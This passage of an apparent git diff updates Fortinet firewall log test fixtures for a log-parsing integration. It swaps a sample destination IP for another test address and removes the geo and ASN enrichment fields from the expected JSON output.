cookies="df868dsg876d/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="elasticvpn" status="success" init="local" mode="main" dir="outbound" stage=1 role="initiator" result="OK" +<187>date=2020-04-23 time=12:32:47 devname="testswitch3" devid="someotherrouteridagain" logid="0101037124" type="event" subtype="vpn" level="error" vd="root" eventtime=1587231168339114138 tz="-0500" logdesc="IPsec phase 1 error" msg="IPsec phase 1 error" action="negotiate" remip=67.43.156.13 locip=67.43.156.13 remport=500 locport=500 outintf="wan2" cookies="345hkjhdrs87/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="N/A" status="negotiate_error" reason="peer SA proposal not match local policy" peer_notif="NOT-APPLICABLE" +<189>date=2020-04-23 time=12:32:31 devname="testswitch3" devid="someotherrouteridagain" logid="0101037127" type="event" subtype="vpn" level="notice" vd="root" eventtime=1587231151628960857 tz="-0500" logdesc="Progress IPsec phase 1" msg="progress IPsec phase 1" action="negotiate" remip=67.43.156.13 locip=67.43.156.13 remport=500 locport=500 outintf="wan1" cookies="df868dsg876d/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="elasticvpn" status="success" init="local" mode="main" dir="outbound" stage=1 role="initiator" result="OK" <189>date=2020-04-23 time=14:32:09 devname="testswitch3" devid="someotherrouteridagain" logid="0100040704" type="event" subtype="system" level="notice" vd="root" eventtime=1587231129938795255 tz="-0300" logdesc="System performance statistics" action="perf-stats" cpu=0 mem=10 totalsession=23 disk=0 bandwidth="23/4" setuprate=0 disklograte=0 fazlograte=0 freediskstorage=331 sysuptime=25170 msg="Performance statistics: average CPU: 0, memory: 23, concurrent sessions: 20, setup-rate: 0" <189>date=2020-04-23 time=12:32:09 devname="testswitch3" devid="someotherrouteridagain" logid="0102043039" type="event" subtype="user" level="notice" vd="root" eventtime=1587231130109462858 tz="-0500" logdesc="Authentication logon" srcip=10.10.10.10 user="elastiiiuser" authserver="FSSO_elastiauth" action="auth-logon" status="logon" msg="User elastiiiuser added to auth logon" -<189>date=2020-04-23 time=12:32:00 devname="testswitch3" devid="someotherrouteridagain" logid="0101037127" type="event" subtype="vpn" level="notice" vd="root" eventtime=1587231120608961118 tz="-0500" logdesc="Progress IPsec phase 1" msg="progress IPsec phase 1" action="negotiate" remip=8.8.5.4 locip=7.6.3.4 remport=500 locport=500 outintf="wan1" cookies="345khj34566/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="testvpn" status="success" init="local" mode="main" dir="outbound" stage=1 role="initiator" result="OK" +<189>date=2020-04-23 time=12:32:00 devname="testswitch3" devid="someotherrouteridagain" logid="0101037127" type="event" subtype="vpn" level="notice" vd="root" eventtime=1587231120608961118 tz="-0500" logdesc="Progress IPsec phase 1" msg="progress IPsec phase 1" action="negotiate" remip=67.43.156.13 locip=67.43.156.14 remport=500 locport=500 outintf="wan1" cookies="345khj34566/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="testvpn" status="success" init="local" mode="main" dir="outbound" stage=1 role="initiator" result="OK" <189>date=2020-04-23 time=14:24:13 devname="testswitch3" devid="someotherrouteridagain" logid="0100041006" type="event" subtype="system" level="notice" vd="root" eventtime=1587230655301863513 tz="-0300" logdesc="FortiSandbox AV database updated" version="1.522479" msg="FortiSandbox AV database updated" <190>date=2020-04-23 time=12:23:47 devname="testswitch3" devid="someotherrouteridagain" logid="0107045057" type="event" subtype="endpoint" level="information" vd="root" eventtime=1587230627558979735 tz="-0500" logdesc="FortiClient connection added" action="add" status="success" license_limit="unlimited" used_for_type=3 connection_type="sslvpn" count=2 user="elastico" ip=172.16.0.2 name="somerouter" fctuid="645234fdd01F885824F764" msg="Add a FortiClient Connection." -<190>date=2020-04-23 time=12:23:47 devname="testswitch3" devid="someotherrouteridagain" logid="0101039943" type="event" subtype="vpn" level="information" vd="root" eventtime=1587230627334405765 tz="-0500" logdesc="SSL VPN new connection" action="ssl-new-con" tunneltype="ssl" tunnelid=2 remip=8.8.8.6 user="N/A" group="N/A" dst_host="N/A" reason="N/A" msg="SSL new connection" -<190>date=2020-04-23 time=12:23:47 devname="testswitch3" devid="someotherrouteridagain" logid="0101039947" type="event" subtype="vpn" level="information" vd="root" eventtime=1587230627698970007 tz="-0500" logdesc="SSL VPN tunnel up" action="tunnel-up" tunneltype="ssl-tunnel" tunnelid=2345 remip=8.8.5.4 tunnelip=10.10.10.10 user="someuser" group="somegroup" dst_host="N/A" reason="tunnel established" msg="SSL tunnel established" +<190>date=2020-04-23 time=12:23:47 devname="testswitch3" devid="someotherrouteridagain" logid="0101039943" type="event" subtype="vpn" level="information" vd="root" eventtime=1587230627334405765 tz="-0500" logdesc="SSL VPN new connection" action="ssl-new-con" tunneltype="ssl" tunnelid=2 remip=67.43.156.13 user="N/A" group="N/A" dst_host="N/A" reason="N/A" msg="SSL new connection" +<190>date=2020-04-23 time=12:23:47 devname="testswitch3" devid="someotherrouteridagain" logid="0101039947" type="event" subtype="vpn" level="information" vd="root" eventtime=1587230627698970007 tz="-0500" logdesc="SSL VPN tunnel up" action="tunnel-up" tunneltype="ssl-tunnel" tunnelid=2345 remip=67.43.156.13 tunnelip=10.10.10.10 user="someuser" group="somegroup" dst_host="N/A" reason="tunnel established" msg="SSL tunnel established" <189>date=2020-04-23 time=14:16:42 devname="testswitch3" devid="someotherrouteridagain" logid="0102043015" type="event" subtype="user" level="notice" vd="root" eventtime=1587230204674924332 tz="-0300" logdesc="FSSO log off authentication status" srcip=192.168.1.1 user="elasticadmin" server="FSSO_somefssoserver" action="FSSO-logoff" msg="FSSO-logoff event from FSSO_somefssoserver: user elasticuser logged off 1192.168.1.1" -<189>date=2020-04-23 time=12:16:02 devname="testswitch3" devid="someotherrouteridagain" logid="0100022915" type="event" subtype="system" level="notice" vd="root" eventtime=1587230163121116383 tz="-0500" logdesc="FortiCloud server connected" server="9.9.9.9" action="connect" msg="FortiCloud 9.9.9.9 server is connected" +<189>date=2020-04-23 time=12:16:02 devname="testswitch3" devid="someotherrouteridagain" logid="0100022915" type="event" subtype="system" level="notice" vd="root" eventtime=1587230163121116383 tz="-0500" logdesc="FortiCloud server connected" server="67.43.156.13" action="connect" msg="FortiCloud 67.43.156.13 server is connected" <189>date=2020-04-23 time=12:16:02 devname="testswitch3" devid="someotherrouteridagain" logid="0100022913" type="event" subtype="system" level="notice" vd="root" eventtime=1587230163375149856 tz="-0500" logdesc="FortiCloud server disconnected" server="4.4.4.4" action="disconnect" reason="connection reset" msg="FortiCloud 4.4.4.4 server is disconnected" -<188>date=2020-04-23 time=12:14:09 devname="newfirewall" devid="newrouterid" logid="0000000011" type="traffic" subtype="forward" level="warning" vd="root" eventtime=1587230049761513222 tz="-0500" srcip=192.168.1.6 srcport=53438 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=53 dstintf="wan1" dstintfrole="wan" sessionid=435234 proto=17 action="dns" policyid=26 policytype="policy" poluuid="2345de-b143-52134d8-6654f-4654sdfg16f431" policyname="elasticnewruleset" service="DNS" dstcountry="Netherlands" srccountry="Reserved" appcat="unscanned" crscore=5 craction=54144 crlevel="low" -<189>date=2020-04-23 time=12:11:51 devname="newfirewall" devid="newrouterid" logid="0000000020" type="traffic" subtype="forward" level="notice" vd="root" eventtime=1587229911390385486 tz="-0500" srcip=192.168.10.10 srcport=6000 srcintf="port1" srcintfrole="lan" dstip=8.6.4.7 dstport=6000 dstintf="wan1" dstintfrole="wan" sessionid=4352 proto=17 action="accept" policyid=3426 policytype="policy" poluuid="1765de8-5a13-765da73fdsfa1c" policyname="newruleelastic" service="portname" dstcountry="Netherlands" srccountry="Reserved" trandisp="snat" transip=123.123.123.123 transport=60964 appcat="unknown" applist="policylist" duration=5462 sentbyte=438650 rcvdbyte=65446 sentpkt=723417 rcvdpkt=1045601 vwlid=0 sentdelta=576 rcvddelta=728 -<189>date=2020-04-23 time=12:11:48 devname="newfirewall" devid="newrouterid" logid="0001000014" type="traffic" subtype="local" level="notice" vd="root" eventtime=1587229908751434997 tz="-0500" srcip=2001:4860:4860::8888 identifier=0 srcintf="port1" srcintfrole="lan" dstip=2001:4860:4860::8888 dstintf="unknown0" dstintfrole="undefined" sessionid=6542345 proto=58 action="accept" policyid=0 policytype="someotherpolicy" service="icmp6/1/0" trandisp="noop" app="icmp6/25/0" duration=42 sentbyte=3014 rcvdbyte=20 sentpkt=4 rcvdpkt=0 appcat="unscanned" -<189>date=2020-04-23 time=13:10:57 devname="newfirewall" devid="newrouterid" logid="0001000014" type="traffic" subtype="local" level="notice" vd="root" eventtime=1587229857509058693 tz="-0400" srcip=9.7.7.7 identifier=61 srcintf="wan1" srcintfrole="wan" dstip=8.8.8.8 dstintf="unknown0" dstintfrole="undefined" sessionid=123 proto=1 action="accept" policyid=0 policytype="rulepolicy" service="PING" dstcountry="Norway" srccountry="Netherlands" trandisp="noop" app="PING" duration=20 sentbyte=0 rcvdbyte=10 sentpkt=0 rcvdpkt=40 appcat="unscanned" +<188>date=2020-04-23 time=12:14:09 devname="newfirewall" devid="newrouterid" logid="0000000011" type="traffic" subtype="forward" level="warning" vd="root" eventtime=1587230049761513222 tz="-0500" srcip=192.168.1.6 srcport=53438 srcintf="port1" srcintfrole="lan" dstip=67.43.156.13 dstport=53 dstintf="wan1" dstintfrole="wan" sessionid=435234 proto=17 action="dns" policyid=26 policytype="policy" poluuid="2345de-b143-52134d8-6654f-4654sdfg16f431" policyname="elasticnewruleset" service="DNS" dstcountry="Netherlands" srccountry="Reserved" appcat="unscanned" crscore=5 craction=54144 crlevel="low" +<189>date=2020-04-23 time=12:11:51 devname="newfirewall" devid="newrouterid" logid="0000000020" type="traffic" subtype="forward" level="notice" vd="root" eventtime=1587229911390385486 tz="-0500" srcip=192.168.10.10 srcport=6000 srcintf="port1" srcintfrole="lan" dstip=67.43.156.13 dstport=6000 dstintf="wan1" dstintfrole="wan" sessionid=4352 proto=17 action="accept" policyid=3426 policytype="policy" poluuid="1765de8-5a13-765da73fdsfa1c" policyname="newruleelastic" service="portname" dstcountry="Netherlands" srccountry="Reserved" trandisp="snat" transip=67.43.156.14 transport=60964 appcat="unknown" applist="policylist" duration=5462 sentbyte=438650 rcvdbyte=65446 sentpkt=723417 rcvdpkt=1045601 vwlid=0 sentdelta=576 rcvddelta=728 +<189>date=2020-04-23 time=12:11:48 devname="newfirewall" devid="newrouterid" logid="0001000014" type="traffic" subtype="local" level="notice" vd="root" eventtime=1587229908751434997 tz="-0500" srcip=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 identifier=0 srcintf="port1" srcintfrole="lan" dstip=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 dstintf="unknown0" dstintfrole="undefined" sessionid=6542345 proto=58 action="accept" policyid=0 policytype="someotherpolicy" service="icmp6/1/0" trandisp="noop" app="icmp6/25/0" duration=42 sentbyte=3014 rcvdbyte=20 sentpkt=4 rcvdpkt=0 appcat="unscanned" +<189>date=2020-04-23 time=13:10:57 devname="newfirewall" devid="newrouterid" logid="0001000014" type="traffic" subtype="local" level="notice" vd="root" eventtime=1587229857509058693 tz="-0400" srcip=67.43.156.13 identifier=61 srcintf="wan1" srcintfrole="wan" dstip=67.43.156.13 dstintf="unknown0" dstintfrole="undefined" sessionid=123 proto=1 action="accept" policyid=0 policytype="rulepolicy" service="PING" dstcountry="Norway" srccountry="Netherlands" trandisp="noop" app="PING" duration=20 sentbyte=0 rcvdbyte=10 sentpkt=0 rcvdpkt=40 appcat="unscanned" <188>date=2020-04-23 time=12:14:39 devname="firewall3" devid="oldfwid" logid="0000000011" type="traffic" subtype="forward" level="warning" vd="root" eventtime=1587230079841464445 tz="-0500" srcip=192.168.1.1 srcport=62493 srcintf="port1" srcintfrole="lan" dstip=192.168.100.100 dstport=1235 dstintf="newinterface" dstintfrole="undefined" sessionid=54234 proto=17 action="ip-conn" policyid=49 policytype="policy" poluuid="654cc-b6542-53467u8-e45234-1566casd35f7836" policyname="oldpolicyname" user="elasticsuper" authserver="FSSO_newfsso" service="udp/12302" dstcountry="Reserved" srccountry="Reserved" appcat="unscanned" crscore=5 craction=63332144 crlevel="low" -<189>date=2020-04-23 time=12:14:28 devname="firewall3" devid="oldfwid" logid="0000000013" type="traffic" subtype="forward" level="notice" vd="root" eventtime=1587230069291463928 tz="-0500" srcip=192.168.50.50 srcport=56603 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=442 dstintf="wan1" dstintfrole="wan" sessionid=2345 proto=6 action="close" policyid=2365 policytype="policy" poluuid="654644c-b064-fdgdf3425-f003-1234ghdf682e05f" policyname="someoldpolicyname" user="elasticuser" group="testgroup" authserver="FSSO_something" service="HTTPS" dstcountry="Netherlands" srccountry="Reserved" trandisp="snat" transip=23.23.23.23 transport=603 appid=43540 app="Skype.Portals" appcat="Collaboration" apprisk="elevated" applist="someapplist" appact="detected" duration=126 sentbyte=923 rcvdbyte=77654 sentpkt=113 rcvdpkt=70 vwlid=4 vwlquality="Seq_num(3), alive, selected" wanin=1130 wanout=6671 lanin=1406 lanout=146506 utmaction="block" countweb=1 countapp=1 crscore=5 craction=6144 crlevel="low" -<190>date=2019-05-15 time=18:03:36 logid="1059028704" type="utm" subtype="app-ctrl" eventtype="app-ctrl-all" level="information" vd="root" eventtime=1557968615 appid=40568 srcip=10.1.100.22 dstip=195.8.215.136 srcport=50798 dstport=443 srcintf="port10" srcintfrole="lan" dstintf="port9" dstintfrole="wan" proto=6 service="HTTPS" direction="outgoing" policyid=1 sessionid=4414 applist="block-social.media" appcat="Web.Client" app="HTTPS.BROWSER" action="pass" hostname="www.dailymotion.com" incidentserialno=1962906680 url="/" msg="Web.Client: HTTPS.BROWSER," apprisk="medium" scertcname="*.dailymotion.com" scertissuer="DigiCert SHA2 High Assurance Server CA" -<190>date=2020-11-02 time=08:11:38 devname=testfirewall devid=newrouterid logid=0101037127 type="event" subtype=vpn level=notice vd=root logdesc="Progress IPsec phase 1" msg="progress IPsec phase 1" action=negotiate remip=8.8.8.8 locip=10.10.10.10 remport=500 locport=500 outintf="port1" cookies="125cbf9ee8349965/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="P1_Test" status=success init=local mode=aggressive dir=outbound stage=1 role=initiator result=OK +<189>date=2020-04-23 time=12:14:28 devname="firewall3" devid="oldfwid" logid="0000000013" type="traffic" subtype="forward" level="notice" vd="root" eventtime=1587230069291463928 tz="-0500" srcip=192.168.50.50 srcport=56603 srcintf="port1" srcintfrole="lan" dstip=67.43.156.13 dstport=442 dstintf="wan1" dstintfrole="wan" sessionid=2345 proto=6 action="close" policyid=2365 policytype="policy" poluuid="654644c-b064-fdgdf3425-f003-1234ghdf682e05f" policyname="someoldpolicyname" user="elasticuser" group="testgroup" authserver="FSSO_something" service="HTTPS" dstcountry="Netherlands" srccountry="Reserved" trandisp="snat" transip=67.43.156.14 transport=603 appid=43540 app="Skype.Portals" appcat="Collaboration" apprisk="elevated" applist="someapplist" appact="detected" duration=126 sentbyte=923 rcvdbyte=77654 sentpkt=113 rcvdpkt=70 vwlid=4 vwlquality="Seq_num(3), alive, selected" wanin=1130 wanout=6671 lanin=1406 lanout=146506 utmaction="block" countweb=1 countapp=1 crscore=5 craction=6144 crlevel="low" +<190>date=2019-05-15 time=18:03:36 logid="1059028704" type="utm" subtype="app-ctrl" eventtype="app-ctrl-all" level="information" vd="root" eventtime=1557968615 appid=40568 srcip=10.1.100.22 dstip=67.43.156.14 srcport=50798 dstport=443 srcintf="port10" srcintfrole="lan" dstintf="port9" dstintfrole="wan" proto=6 service="HTTPS" direction="outgoing" policyid=1 sessionid=4414 applist="block-social.media" appcat="Web.Client" app="HTTPS.BROWSER" action="pass" hostname="www.dailymotion.com" incidentserialno=1962906680 url="/" msg="Web.Client: HTTPS.BROWSER," apprisk="medium" scertcname="*.dailymotion.com" scertissuer="DigiCert SHA2 High Assurance Server CA" +<190>date=2020-11-02 time=08:11:38 devname=testfirewall devid=newrouterid logid=0101037127 type="event" subtype=vpn level=notice vd=root logdesc="Progress IPsec phase 1" msg="progress IPsec phase 1" action=negotiate remip=67.43.156.13 locip=10.10.10.10 remport=500 locport=500 outintf="port1" cookies="125cbf9ee8349965/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="P1_Test" status=success init=local mode=aggressive dir=outbound stage=1 role=initiator result=OK <190>devname="firewall" devid="FG201EEF34CD12AB" vd="root" date=2021-05-07 time=08:31:14 eventtime=1620372674880370858 tz="+0100" logid="0112053203" type="event" subtype="connector" level="information" logdesc="Dynamic address updated" fctemssn="FCTEMS0000011111" addr="FCTEMS0000011111_AV-Running" msg="Updated tag FCTEMS0000011111_AV-Running." <190>devname="firewall" devid="FG201EEF34CD12AB" vd="root" date=2021-05-07 time=08:31:14 eventtime=1620372674880455433 tz="+0100" logid="0112053203" type="event" subtype="connector" level="information" logdesc="Dynamic address updated" fctemssn="FCTEMS0000011111" addr="MAC_FCTEMS0000011111_AV-Running" msg="Updated tag MAC_FCTEMS0000011111_AV-Running." <190>devname="firewall" devid="FG201EEF34CD12AB" vd="root" date=2021-05-07 time=08:31:14 eventtime=1620372674880744919 tz="+0100" logid="0112053203" type="event" subtype="connector" level="information" logdesc="Dynamic address updated" fctemssn="FCTEMS0000011111" addr="FCTEMS0000011111_Connected-to-EMS" msg="Updated tag FCTEMS0000011111_Connected-to-EMS." diff --git a/packages/fortinet/data_stream/firewall/_dev/test/pipeline/test-fortinet.log-expected.json b/packages/fortinet/data_stream/firewall/_dev/test/pipeline/test-fortinet.log-expected.json index 5e14315d3bf..abd66fda118 100644 --- a/packages/fortinet/data_stream/firewall/_dev/test/pipeline/test-fortinet.log-expected.json +++ b/packages/fortinet/data_stream/firewall/_dev/test/pipeline/test-fortinet.log-expected.json @@ -5,24 +5,9 @@ "level": "warning" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, "port": 443, "bytes": 1130, - "ip": "8.8.8.8" + "ip": "67.43.156.13" }, "rule": { "ruleset": "elasticruleset", @@ -81,7 +66,7 @@ ], "ip": [ "192.168.2.1", - "8.8.8.8" + "67.43.156.13" ] }, "fortinet": { @@ -100,8 +85,8 @@ } }, "event": { - "ingested": "2021-06-29T09:32:55.133566500Z", - "original": "\u003c188\u003edate=2020-04-23 time=12:17:48 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"0316013056\" type=\"utm\" subtype=\"webfilter\" eventtype=\"ftgd_blk\" level=\"warning\" vd=\"root\" eventtime=1587230269052907555 tz=\"-0500\" policyid=100602 sessionid=1234 user=\"elasticuser\" group=\"elasticgroup\" authserver=\"elasticauth\" srcip=192.168.2.1 srcport=61930 srcintf=\"port1\" srcintfrole=\"lan\" dstip=8.8.8.8 dstport=443 dstintf=\"wan1\" dstintfrole=\"wan\" proto=6 service=\"HTTPS\" hostname=\"elastic.co\" profile=\"elasticruleset\" action=\"blocked\" reqtype=\"direct\" url=\"/config/\" sentbyte=1152 rcvdbyte=1130 direction=\"outgoing\" msg=\"URL belongs to a denied category in policy\" method=\"domain\" cat=76 catdesc=\"Internet Telephony\"", + "ingested": "2021-12-09T13:37:22.357746800Z", + "original": "\u003c188\u003edate=2020-04-23 time=12:17:48 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"0316013056\" type=\"utm\" subtype=\"webfilter\" eventtype=\"ftgd_blk\" level=\"warning\" vd=\"root\" eventtime=1587230269052907555 tz=\"-0500\" policyid=100602 sessionid=1234 user=\"elasticuser\" group=\"elasticgroup\" authserver=\"elasticauth\" srcip=192.168.2.1 srcport=61930 srcintf=\"port1\" srcintfrole=\"lan\" dstip=67.43.156.13 dstport=443 dstintf=\"wan1\" dstintfrole=\"wan\" proto=6 service=\"HTTPS\" hostname=\"elastic.co\" profile=\"elasticruleset\" action=\"blocked\" reqtype=\"direct\" url=\"/config/\" sentbyte=1152 rcvdbyte=1130 direction=\"outgoing\" msg=\"URL belongs to a denied category in policy\" method=\"domain\" cat=76 catdesc=\"Internet Telephony\"", "code": "0316013056", "timezone": "-0500", "kind": "event", @@ -121,24 +106,9 @@ "level": "notice" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, "port": 161, "bytes": 0, - "ip": "8.8.8.8" + "ip": "67.43.156.13" }, "rule": { "ruleset": "policy", @@ -183,7 +153,7 @@ "related": { "ip": [ "10.10.10.10", - "8.8.8.8" + "67.43.156.13" ] }, "fortinet": { @@ -205,8 +175,8 @@ }, "event": { "duration": 0, - "ingested": "2021-06-29T09:32:55.133579400Z", - "original": "\u003c189\u003edate=2020-04-23 time=01:16:08 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"0000000013\" type=\"traffic\" subtype=\"forward\" level=\"notice\" vd=\"OPERATIONAL\" eventtime=1592961368 srcip=10.10.10.10 srcport=60899 srcintf=\"srcintfname\" srcintfrole=\"lan\" dstip=8.8.8.8 dstport=161 dstintf=\"dstintfname\" dstintfrole=\"lan\" sessionid=155313 proto=17 action=\"deny\" policyid=0 policytype=\"policy\" service=\"SNMP\" dstcountry=\"Reserved\" srccountry=\"Reserved\" trandisp=\"noop\" duration=0 sentbyte=0 rcvdbyte=0 sentpkt=0 appcat=\"unscanned\" crscore=30 craction=131072 crlevel=\"high\"", + "ingested": "2021-12-09T13:37:22.357751700Z", + "original": "\u003c189\u003edate=2020-04-23 time=01:16:08 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"0000000013\" type=\"traffic\" subtype=\"forward\" level=\"notice\" vd=\"OPERATIONAL\" eventtime=1592961368 srcip=10.10.10.10 srcport=60899 srcintf=\"srcintfname\" srcintfrole=\"lan\" dstip=67.43.156.13 dstport=161 dstintf=\"dstintfname\" dstintfrole=\"lan\" sessionid=155313 proto=17 action=\"deny\" policyid=0 policytype=\"policy\" service=\"SNMP\" dstcountry=\"Reserved\" srccountry=\"Reserved\" trandisp=\"noop\" duration=0 sentbyte=0 rcvdbyte=0 sentpkt=0 appcat=\"unscanned\" crscore=30 craction=131072 crlevel=\"high\"", "code": "0000000013", "kind": "event", "start": "2020-06-24T01:16:08.000Z", @@ -226,24 +196,9 @@ "level": "notice" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, "port": 443, "bytes": 6812, - "ip": "8.8.8.8" + "ip": "67.43.156.13" }, "rule": { "ruleset": "elasticruleset", @@ -302,7 +257,7 @@ ], "ip": [ "192.168.2.1", - "8.8.8.8" + "67.43.156.13" ] }, "fortinet": { @@ -321,8 +276,8 @@ } }, "event": { - "ingested": "2021-06-29T09:32:55.133587Z", - "original": "\u003c189\u003edate=2020-04-23 time=12:17:45 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"0317013312\" type=\"utm\" subtype=\"webfilter\" eventtype=\"ftgd_allow\" level=\"notice\" vd=\"root\" eventtime=1587230266314799756 tz=\"-0500\" policyid=38 sessionid=543234 user=\"elasticuser\" group=\"elasticgroup\" authserver=\"elasticauth\" srcip=192.168.2.1 srcport=65236 srcintf=\"port1\" srcintfrole=\"lan\" dstip=8.8.8.8 dstport=443 dstintf=\"wan1\" dstintfrole=\"wan\" proto=6 service=\"HTTPS\" hostname=\"elastic.co\" profile=\"elasticruleset\" action=\"passthrough\" reqtype=\"direct\" url=\"/\" sentbyte=3545 rcvdbyte=6812 direction=\"outgoing\" msg=\"URL belongs to an allowed category in policy\" method=\"domain\" cat=23 catdesc=\"Web-based Email\"", + "ingested": "2021-12-09T13:37:22.357757Z", + "original": "\u003c189\u003edate=2020-04-23 time=12:17:45 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"0317013312\" type=\"utm\" subtype=\"webfilter\" eventtype=\"ftgd_allow\" level=\"notice\" vd=\"root\" eventtime=1587230266314799756 tz=\"-0500\" policyid=38 sessionid=543234 user=\"elasticuser\" group=\"elasticgroup\" authserver=\"elasticauth\" srcip=192.168.2.1 srcport=65236 srcintf=\"port1\" srcintfrole=\"lan\" dstip=67.43.156.13 dstport=443 dstintf=\"wan1\" dstintfrole=\"wan\" proto=6 service=\"HTTPS\" hostname=\"elastic.co\" profile=\"elasticruleset\" action=\"passthrough\" reqtype=\"direct\" url=\"/\" sentbyte=3545 rcvdbyte=6812 direction=\"outgoing\" msg=\"URL belongs to an allowed category in policy\" method=\"domain\" cat=23 catdesc=\"Web-based Email\"", "code": "0317013312", "timezone": "-0500", "kind": "event", @@ -342,23 +297,8 @@ "level": "information" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, "port": 443, - "ip": "8.8.8.8" + "ip": "67.43.156.13" }, "rule": { "ruleset": "elasticruleset", @@ -416,7 +356,7 @@ ], "ip": [ "192.168.2.1", - "8.8.8.8" + "67.43.156.13" ] }, "fortinet": { @@ -444,8 +384,8 @@ } }, "event": { - "ingested": "2021-06-29T09:32:55.133594300Z", - "original": "\u003c190\u003edate=2020-04-23 time=13:17:35 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"1059028704\" type=\"utm\" subtype=\"app-ctrl\" eventtype=\"signature\" level=\"information\" vd=\"root\" eventtime=1587230255061492894 tz=\"-0400\" appid=40568 user=\"elasticuser\" group=\"elasticgroup\" authserver=\"elasticauth\" srcip=192.168.2.1 dstip=8.8.8.8 srcport=59790 dstport=443 srcintf=\"LAN\" srcintfrole=\"lan\" dstintf=\"wan1\" dstintfrole=\"wan\" proto=6 service=\"SSL\" direction=\"outgoing\" policyid=12 sessionid=453234 applist=\"elasticruleset\" action=\"pass\" appcat=\"Web.Client\" app=\"HTTPS.BROWSER\" hostname=\"elastic.co\" incidentserialno=23465 url=\"/\" msg=\"Web.Client: HTTPS.BROWSER,\" apprisk=\"medium\" scertcname=\"test.elastic.co\"", + "ingested": "2021-12-09T13:37:22.357762600Z", + "original": "\u003c190\u003edate=2020-04-23 time=13:17:35 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"1059028704\" type=\"utm\" subtype=\"app-ctrl\" eventtype=\"signature\" level=\"information\" vd=\"root\" eventtime=1587230255061492894 tz=\"-0400\" appid=40568 user=\"elasticuser\" group=\"elasticgroup\" authserver=\"elasticauth\" srcip=192.168.2.1 dstip=67.43.156.13 srcport=59790 dstport=443 srcintf=\"LAN\" srcintfrole=\"lan\" dstintf=\"wan1\" dstintfrole=\"wan\" proto=6 service=\"SSL\" direction=\"outgoing\" policyid=12 sessionid=453234 applist=\"elasticruleset\" action=\"pass\" appcat=\"Web.Client\" app=\"HTTPS.BROWSER\" hostname=\"elastic.co\" incidentserialno=23465 url=\"/\" msg=\"Web.Client: HTTPS.BROWSER,\" apprisk=\"medium\" scertcname=\"test.elastic.co\"", "code": "1059028704", "timezone": "-0400", "kind": "event", @@ -465,23 +405,8 @@ "level": "information" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, "port": 443, - "ip": "8.8.8.8" + "ip": "67.43.156.13" }, "rule": { "ruleset": "elasticruleset", @@ -539,7 +464,7 @@ ], "ip": [ "192.168.2.1", - "8.8.8.8" + "67.43.156.13" ] }, "fortinet": { @@ -567,8 +492,8 @@ } }, "event": { - "ingested": "2021-06-29T09:32:55.133601600Z", - "original": "\u003c190\u003edate=2020-04-23 time=13:17:35 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"1059028704\" type=\"utm\" subtype=\"app-ctrl\" eventtype=\"signature\" level=\"information\" vd=\"root\" eventtime=1591788391 tz=\"-0400\" appid=40568 user=\"elasticuser\" group=\"elasticgroup\" authserver=\"elasticauth\" srcip=192.168.2.1 dstip=8.8.8.8 srcport=59790 dstport=443 srcintf=\"LAN\" srcintfrole=\"lan\" dstintf=\"wan1\" dstintfrole=\"wan\" proto=6 service=\"SSL\" direction=\"outgoing\" policyid=12 sessionid=453234 applist=\"elasticruleset\" action=\"pass\" appcat=\"Web.Client\" app=\"HTTPS.BROWSER\" hostname=\"elastic.co\" incidentserialno=23465 url=\"/\" msg=\"Web.Client: HTTPS.BROWSER,\" apprisk=\"medium\" scertcname=\"test.elastic.co\"", + "ingested": "2021-12-09T13:37:22.357767800Z", + "original": "\u003c190\u003edate=2020-04-23 time=13:17:35 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"1059028704\" type=\"utm\" subtype=\"app-ctrl\" eventtype=\"signature\" level=\"information\" vd=\"root\" eventtime=1591788391 tz=\"-0400\" appid=40568 user=\"elasticuser\" group=\"elasticgroup\" authserver=\"elasticauth\" srcip=192.168.2.1 dstip=67.43.156.13 srcport=59790 dstport=443 srcintf=\"LAN\" srcintfrole=\"lan\" dstintf=\"wan1\" dstintfrole=\"wan\" proto=6 service=\"SSL\" direction=\"outgoing\" policyid=12 sessionid=453234 applist=\"elasticruleset\" action=\"pass\" appcat=\"Web.Client\" app=\"HTTPS.BROWSER\" hostname=\"elastic.co\" 